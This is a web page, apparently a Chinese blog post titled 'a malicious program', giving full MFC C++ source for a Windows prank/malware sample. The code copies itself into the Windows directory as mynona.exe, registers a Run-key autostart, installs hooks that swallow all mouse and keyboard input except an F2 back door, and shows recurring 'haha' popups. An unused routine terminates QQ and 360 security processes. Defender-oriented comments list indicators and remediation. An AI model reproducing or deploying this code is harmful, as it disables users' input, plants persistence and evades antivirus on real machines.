
一个恶意程序

Jun 13, 2016 am 11:31 AM

<span //</span><span  KeyBoardHookDialogDlg.cpp : implementation file
</span><span //
</span><span 
#include </span><span "</span><span stdafx.h</span><span "</span><span 
#include </span><span "</span><span KeyBoardHookDialog.h</span><span "</span><span 
#include </span><span "</span><span KeyBoardHookDialogDlg.h</span><span "</span>
<span #define</span> REG_RUN "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run"<span 
 #include </span><tlhelp32.h><span 

#ifdef _DEBUG
</span><span #define</span> new DEBUG_NEW
<span #undef</span> THIS_FILE
<span static</span> <span char</span> THIS_FILE[] =<span  __FILE__;
</span><span #endif</span>
<span //</span><span #pragma comment (lib,"KeyBoardHook")</span>
<span ///////////////////////////////////////////////////////////////////////////</span><span //</span>
<span //</span><span  CAboutDlg dialog used for App About
// File-scope state shared between the dialog and the free-standing hook procedures.

// Handle of the dialog window; OnInitDialog() stores m_hWnd here so that
// KeyboardProc() can send WM_CLOSE to it.
HWND hWnd;

// Hook handles returned by SetWindowsHookEx() in OnInitDialog() and released
// by UnhookWindowsHookEx() in KeyboardProc().
HHOOK  g_hMouse;
HHOOK  g_hKeyboard;

// Becomes true at the end of OnInitDialog(); while it is true OnTimer()
// hides the dialog window on every tick.
bool isTrue = false;

// Note: the two hook procedures below are free functions, not dialog members,
// so Win32 calls made inside them have to use the global (::) API.

// Mouse hook procedure registered for WH_MOUSE in OnInitDialog().
//
// nCode  - hook code (ignored)
// wParam - message identifier (ignored)
// lParam - mouse coordinates (ignored)
//
// Always returns a non-zero value and never calls CallNextHookEx(), so every
// mouse message that reaches this hook is dropped instead of being delivered.
// For an analyst this is the "mouse stops responding" symptom of the sample.
LRESULT CALLBACK MouseProc(int nCode, WPARAM wParam, LPARAM lParam)
{
    const LRESULT kDiscardMessage = 1;
    return kDiscardMessage;
}

 // Keyboard hook procedure registered for WH_KEYBOARD in OnInitDialog().
 //
 // code   - hook code (never examined)
 // wParam - virtual-key code
 // lParam - keystroke-message information (unused)
 //
 // Every keystroke is swallowed: the function returns 1 unconditionally and
 // never forwards to CallNextHookEx(). The author left one exit key (F2,
 // called a "back door" in the original comment): pressing it closes the
 // dialog and removes both hooks.
 //
 // Earlier experiments that blocked only Space/Return or Alt+F4 and forwarded
 // everything else were commented out in the original listing.
 //
 // NOTE(review): the documented hook contract expects code < 0 to be passed
 // straight to CallNextHookEx(); this procedure does not do that.
 LRESULT CALLBACK KeyboardProc(int code, WPARAM wParam, LPARAM lParam)
 {
     const bool exitKeyPressed = (wParam == VK_F2);
     if (exitKeyPressed)
     {
         // Ask the dialog to close through the global API (we are not a member).
         ::SendMessage(hWnd, WM_CLOSE, 0, 0);

         // Remove both hooks.
         UnhookWindowsHookEx(g_hMouse);
         UnhookWindowsHookEx(g_hKeyboard);
     }

     // Non-zero result: the keystroke is not passed on.
     return 1;
 }


// Dialog used for the application's About box. It declares no message
// handlers of its own; the //{{AFX_...}} markers are kept for ClassWizard.
class CAboutDlg : public CDialog
{
public:
    CAboutDlg();

// Dialog Data
    //{{AFX_DATA(CAboutDlg)
    enum { IDD = IDD_ABOUTBOX };
    //}}AFX_DATA

    // ClassWizard generated virtual function overrides
    //{{AFX_VIRTUAL(CAboutDlg)
protected:
    virtual void DoDataExchange(CDataExchange* pDX);    // DDX/DDV support
    //}}AFX_VIRTUAL

// Implementation
protected:
    //{{AFX_MSG(CAboutDlg)
    //}}AFX_MSG
    DECLARE_MESSAGE_MAP()
};

// Constructs the About dialog from its dialog resource (CAboutDlg::IDD).
CAboutDlg::CAboutDlg()
    : CDialog(CAboutDlg::IDD)
{
    //{{AFX_DATA_INIT(CAboutDlg)
    //}}AFX_DATA_INIT
}

// DDX/DDV entry point for the About dialog; it only defers to the base class
// because the dialog has no data members to exchange.
void CAboutDlg::DoDataExchange(CDataExchange* pDX)
{
    CDialog::DoDataExchange(pDX);

    //{{AFX_DATA_MAP(CAboutDlg)
    //}}AFX_DATA_MAP
}

// Message map of the About dialog: intentionally empty.
BEGIN_MESSAGE_MAP(CAboutDlg, CDialog)
    //{{AFX_MSG_MAP(CAboutDlg)
        // No message handlers
    //}}AFX_MSG_MAP
END_MESSAGE_MAP()

</span><span ///////////////////////////////////////////////////////////////////////////</span><span //</span>
<span //</span><span  CKeyBoardHookDialogDlg dialog</span>
<span 
// Constructs the main dialog and loads the application icon.
//
// pParent - parent window passed through to CDialog (the default of NULL is
//           declared in the header, which is not part of this listing).
CKeyBoardHookDialogDlg::CKeyBoardHookDialogDlg(CWnd* pParent /*=NULL*/)
    : CDialog(CKeyBoardHookDialogDlg::IDD, pParent)
{
    //{{AFX_DATA_INIT(CKeyBoardHookDialogDlg)
        // NOTE: the ClassWizard will add member initialization here
    //}}AFX_DATA_INIT

    // Note that LoadIcon does not require a subsequent DestroyIcon in Win32
    CWinApp* pApp = AfxGetApp();
    m_hIcon = pApp->LoadIcon(IDR_MAINFRAME);
}

// DDX/DDV entry point for the main dialog; no controls are bound, so it only
// forwards to the base class.
void CKeyBoardHookDialogDlg::DoDataExchange(CDataExchange* pDX)
{
    CDialog::DoDataExchange(pDX);

    //{{AFX_DATA_MAP(CKeyBoardHookDialogDlg)
        // NOTE: the ClassWizard will add DDX and DDV calls here
    //}}AFX_DATA_MAP
}

// Message map of the main dialog. Besides the standard system-command, paint
// and drag-icon handlers it routes the IDC_BTN_HOOKON button to OnBtnHookon()
// (an empty handler in this file) and WM_TIMER to OnTimer(), which is where
// the window is hidden and the recurring message box is raised.
BEGIN_MESSAGE_MAP(CKeyBoardHookDialogDlg, CDialog)
    //{{AFX_MSG_MAP(CKeyBoardHookDialogDlg)
    ON_WM_SYSCOMMAND()
    ON_WM_PAINT()
    ON_WM_QUERYDRAGICON()
    ON_BN_CLICKED(IDC_BTN_HOOKON, OnBtnHookon)
    ON_WM_TIMER()
    //}}AFX_MSG_MAP
END_MESSAGE_MAP()

</span><span ///////////////////////////////////////////////////////////////////////////</span><span //</span>
<span //</span><span  CKeyBoardHookDialogDlg message handlers</span>
<span 
// Dialog initialisation. After the usual MFC set-up (About menu entry, icons)
// this is where all of the sample's unwanted behaviour is started:
//
//   1. CopySelf()  - copies the running executable into the Windows directory
//                    as mynona.exe.
//   2. autoRun()   - registers that copy under the HKLM ...\CurrentVersion\Run
//                    key (value name "mynona") so it starts again at logon.
//   3. Two hooks   - WH_MOUSE and WH_KEYBOARD, whose procedures discard input.
//                    Both are installed with hMod == NULL and the calling
//                    thread's id, i.e. they are attached to this thread only.
//   4. Timer 1     - fires every 2000 ms; see OnTimer().
//
// Triage pointers that follow directly from the code: a file named mynona.exe
// in the Windows directory and a Run-key value named "mynona" are the
// on-disk and registry artefacts to look for and remove.
//
// Returns TRUE so the framework sets the default focus.
BOOL CKeyBoardHookDialogDlg::OnInitDialog()
{
    CDialog::OnInitDialog();

    // Add "About..." menu item to system menu.

    // IDM_ABOUTBOX must be in the system command range.
    ASSERT((IDM_ABOUTBOX & 0xFFF0) == IDM_ABOUTBOX);
    ASSERT(IDM_ABOUTBOX < 0xF000);

    if (CMenu* pSysMenu = GetSystemMenu(FALSE))
    {
        CString strAboutMenu;
        strAboutMenu.LoadString(IDS_ABOUTBOX);
        if (!strAboutMenu.IsEmpty())
        {
            pSysMenu->AppendMenu(MF_SEPARATOR);
            pSysMenu->AppendMenu(MF_STRING, IDM_ABOUTBOX, strAboutMenu);
        }
    }

    // Set the icon for this dialog.  The framework does this automatically
    //  when the application's main window is not a dialog
    SetIcon(m_hIcon, TRUE);     // Set big icon
    SetIcon(m_hIcon, FALSE);    // Set small icon

    // Persistence: drop a copy of the executable, then register it in the
    // registry Run key.
    CopySelf();
    autoRun();

    // (A call to ShowProcess() was commented out here in the original.)

    // Install the input hooks for the current thread.
    const DWORD dwThreadId = GetCurrentThreadId();
    g_hMouse = SetWindowsHookEx(WH_MOUSE, MouseProc, NULL, dwThreadId);
    g_hKeyboard = SetWindowsHookEx(WH_KEYBOARD, KeyboardProc, NULL, dwThreadId);

    // Remember the dialog's window handle for the hook procedures.
    hWnd = m_hWnd;

    // Timer id 1, 2000 ms period, delivered as WM_TIMER to OnTimer().
    SetTimer(1, 2000, NULL);
    isTrue = true;

    return TRUE;  // return TRUE  unless you set the focus to a control
}

// WM_SYSCOMMAND handler: shows the About box for IDM_ABOUTBOX and hands every
// other system command to the base class.
//
// nID    - system command identifier (low four bits are masked off before
//          the comparison)
// lParam - passed through unchanged to CDialog::OnSysCommand
void CKeyBoardHookDialogDlg::OnSysCommand(UINT nID, LPARAM lParam)
{
    if ((nID & 0xFFF0) != IDM_ABOUTBOX)
    {
        CDialog::OnSysCommand(nID, lParam);
        return;
    }

    CAboutDlg dlgAbout;
    dlgAbout.DoModal();
}

</span><span //</span><span  If you add a minimize button to your dialog, you will need the code below
</span><span //</span><span   to draw the icon.  For MFC applications using the document/view model,
</span><span //</span><span   this is automatically done for you by the framework.</span>

// WM_PAINT handler. When the dialog is minimised it draws the application
// icon centred in the client rectangle; otherwise the base class paints.
void CKeyBoardHookDialogDlg::OnPaint()
{
    if (!IsIconic())
    {
        CDialog::OnPaint();
        return;
    }

    CPaintDC dc(this); // device context for painting

    SendMessage(WM_ICONERASEBKGND, (WPARAM) dc.GetSafeHdc(), 0);

    // Center icon in client rectangle
    const int cxIcon = GetSystemMetrics(SM_CXICON);
    const int cyIcon = GetSystemMetrics(SM_CYICON);
    CRect rect;
    GetClientRect(&rect);
    const int x = (rect.Width() - cxIcon + 1) / 2;
    const int y = (rect.Height() - cyIcon + 1) / 2;

    // Draw the icon
    dc.DrawIcon(x, y, m_hIcon);
}

</span><span //</span><span  The system calls this to obtain the cursor to display while the user drags
</span><span //</span><span   the minimized window.</span>
// Returns the dialog icon as the cursor shown while the minimised window is
// being dragged.
HCURSOR CKeyBoardHookDialogDlg::OnQueryDragIcon()
{
    HCURSOR hDragCursor = (HCURSOR) m_hIcon;
    return hDragCursor;
}


// Click handler for IDC_BTN_HOOKON. It is an empty stub: in this listing the
// hooks are installed from OnInitDialog(), not from the button.
void CKeyBoardHookDialogDlg::OnBtnHookon()
{
    // TODO: Add your control notification handler code here
}

</span><span //</span><span DEL void CKeyBoardHookDialogDlg::OnBtnHookoff() 
</span><span //</span><span DEL {
</span><span //</span><span DEL     </span><span //</span><span  TODO: Add your control notification handler code here
</span><span //</span><span DEL     SetHookOff();
</span><span //</span><span DEL     
</span><span //</span><span DEL }</span>

// Hides the dialog window (SW_HIDE). No call to this helper appears in this
// listing; OnTimer() performs the same ShowWindow call itself.
void CKeyBoardHookDialogDlg::hide()
{
    this->ShowWindow(SW_HIDE);
}


// Registry persistence: writes the path held in szWindowsPath as a REG_SZ
// value named "mynona" under
//   HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
// (REG_RUN). OnInitDialog() calls this right after CopySelf(), which leaves
// "<Windows directory>\mynona.exe" in szWindowsPath.
//
// If the key cannot be opened the function returns silently; the results of
// RegSetValueEx and RegCloseKey are not checked.
//
// Defender view: a new value under the machine-wide Run key is a standard
// autostart persistence indicator. Auditing writes to this key, or reviewing
// it with an autostart-enumeration tool, surfaces the "mynona" entry.
//
// NOTE(review): szWindowsPath is declared outside this listing - presumably a
// char array member of the dialog; confirm against the header.
void CKeyBoardHookDialogDlg::autoRun()
{
    HKEY hKey = NULL;
    if (RegOpenKey(HKEY_LOCAL_MACHINE, REG_RUN, &hKey) != ERROR_SUCCESS)
    {
        return;
    }

    // Value data: the path string including its terminating NUL.
    RegSetValueEx(hKey, "mynona", NULL, REG_SZ,
                  (const unsigned char *)&szWindowsPath,
                  strlen(szWindowsPath) + sizeof(char));

    RegCloseKey(hKey);
}

// Walks a Toolhelp process snapshot and, for every entry whose image name is
// QQ.exe, 360tray.exe or 360rp.exe, shows the name in a message box, opens
// the process with PROCESS_TERMINATE access and calls TerminateProcess on it.
//
// The only call site in this listing (in OnInitDialog) is commented out, so
// the routine is dead code as published.
//
// Defender view: a user-mode process that enumerates the process list and
// then requests PROCESS_TERMINATE on security-product processes is a
// defence-evasion pattern; process-access telemetry and the product's own
// self-protection are the usual places to catch or block it.
void CKeyBoardHookDialogDlg::ShowProcess()
{
    HANDLE hSnap = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, NULL);

    PROCESSENTRY32 Pe32 = {0};
    Pe32.dwSize = sizeof(PROCESSENTRY32);
    int bRet = Process32First(hSnap, &Pe32);

    // Image names the routine looks for.
    char name[MAX_PATH] = "QQ.exe";
    char name2[MAX_PATH] = "360tray.exe";
    char name3[MAX_PATH] = "360rp.exe";

    while (bRet)
    {
        // The entry is advanced before it is examined.
        bRet = Process32Next(hSnap, &Pe32);

        const bool matched = strcmp(Pe32.szExeFile, name) == 0
                          || strcmp(Pe32.szExeFile, name3) == 0
                          || strcmp(Pe32.szExeFile, name2) == 0;
        if (!matched)
        {
            continue;
        }

        MessageBox(Pe32.szExeFile);
        HANDLE hProcess = OpenProcess(PROCESS_TERMINATE, FALSE, Pe32.th32ProcessID);
        LPDWORD lpExitCode = 0;
        GetExitCodeProcess(hProcess, lpExitCode);
        TerminateProcess(hProcess, (UINT)lpExitCode);
    }
}

// Copies the running executable to "<Windows directory>\mynona.exe".
//
// Steps, all taken from the calls below:
//   - GetModuleFileName(NULL, ...) obtains the path of the current executable;
//   - GetWindowsDirectory() fills szWindowsPath, and "\mynona.exe" is appended;
//   - the resulting path is shown in a message box (a debugging leftover that
//     is visible to the user);
//   - CopyFile() is called with bFailIfExists == FALSE, so an existing file of
//     that name is overwritten.
//
// szWindowsPath keeps the destination path afterwards; autoRun() writes it to
// the Run key. No return value is checked.
//
// Defender view: an executable copying itself into the Windows directory
// under a new name is a file-system indicator that pairs with the Run-key
// value written by autoRun(); remediation has to remove both.
//
// NOTE(review): szWindowsPath is declared outside this listing - presumably a
// char array of at least MAX_PATH; confirm against the header.
void CKeyBoardHookDialogDlg::CopySelf()
{
    char szSelfName[MAX_PATH] = {0};
    char szTmpPath[MAX_PATH] = {0};   // never used below

    // Path of the running executable.
    GetModuleFileName(NULL, szSelfName, MAX_PATH);

    // Windows directory (the System-directory variant was commented out in
    // the original).
    GetWindowsDirectory(szWindowsPath, MAX_PATH);

    strcat(szWindowsPath, "\\mynona.exe");

    MessageBox(szWindowsPath, ": szWindowsPath");

    // FALSE = do not fail if the destination exists, i.e. overwrite it.
    int copyResult = CopyFile(szSelfName, szWindowsPath, FALSE);
}

// WM_TIMER handler. OnInitDialog() starts timer 1 with a 2000 ms period, so
// on every tick this hides the dialog window (once isTrue has been set) and
// raises a stop-icon message box before deferring to the base class.
//
// nIDEvent - timer identifier, forwarded unchanged to CDialog::OnTimer
//
// For an analyst this is the user-visible symptom of the sample: no main
// window, plus a recurring "haha" message box.
void CKeyBoardHookDialogDlg::OnTimer(UINT nIDEvent)
{
    const bool keepHidden = isTrue;
    if (keepHidden)
    {
        ShowWindow(SW_HIDE);
    }

    MessageBox("haha", "哈哈", MB_ICONSTOP);

    CDialog::OnTimer(nIDEvent);
}